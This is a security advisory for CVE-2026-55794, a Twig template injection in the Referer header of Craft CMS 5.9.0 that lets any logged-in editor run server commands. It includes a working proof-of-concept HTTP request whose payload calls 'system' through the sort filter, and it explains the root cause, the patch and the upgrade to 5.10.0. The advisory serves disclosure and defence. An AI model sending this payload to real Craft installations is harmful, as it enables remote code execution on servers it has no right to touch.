CVE-2026-55794: Craft CMS Authenticated RCE via Twig Injection in Referer Header
A logged-in Craft CMS editor can run arbitrary server commands by placing Twig template code in the HTTP Referer header when saving an entry, because the redirect URL is rendered without sandboxing.
The problem
Craft CMS 5.9.0 introduced logic that redirects users back to the referrer URL after saving an entry. That URL is passed through `renderObjectTemplate()`, which executes it as a full, unsandboxed Twig template.
Any control panel user with permission to edit entries can supply a crafted `Referer` header containing Twig expressions. Because sandboxing is absent, those expressions run with full PHP access, leading to remote code execution.
Proof of concept
A working proof-of-concept for CVE-2026-55794 in craftcms/cms, with the exact payload below.
POST /admin/entries/blog/123 HTTP/1.1
Host: target.example.com
Cookie: CraftSessionId=<valid_session>
Referer: https://target.example.com/admin/entries?p={{['id']|sort('system')}}
Content-Type: application/x-www-form-urlencoded
CRAFT_CSRF_TOKEN=<token>&action=entries/save-entry&entryId=123§ionId=1&typeId=1&title=testThe root cause is a wrong rendering function. Before the fix, the signed referrer URL was passed to `renderObjectTemplate()`, which has no sandbox. The `sort` filter with `system` as the comparator function works because Craft only blocks direct function-name usage in arrow-function filters; `sort` calls `usort()` internally with the string `system` as the callback, so `call_user_func('system', 'id')` executes.
The patch (PR #18680) removes the referrer redirect entirely: elements now track the originating index page URL server-side and redirect there on save, so the `Referer` header is never rendered as a template.
The fix
Update to Craft CMS 5.10.0 or later. The referrer-based redirect is removed in that release; elements instead track the index page URL on the server side. No workaround exists on affected versions short of revoking entry-edit permissions from untrusted users.
Related research
- highCVE-2026-55790CVE-2026-55790: Craft CMS DOM XSS via Poisoned GitHub Issue Title in CraftSupport Widget
- highCVE-2026-49981CVE-2026-49981: Twig Sandbox Filter/Tag/Function Allow-list Bypass via Cached Template
- high · 8.1CVE-2026-49286CVE-2026-49286: pontedilana/php-weasyprint PHAR Deserialization via Case-Insensitive Stream Wrapper Bypass
- highSolidInvoice: IDOR in Symfony LiveComponents Allows Cross-User API Token and Notification Settings Access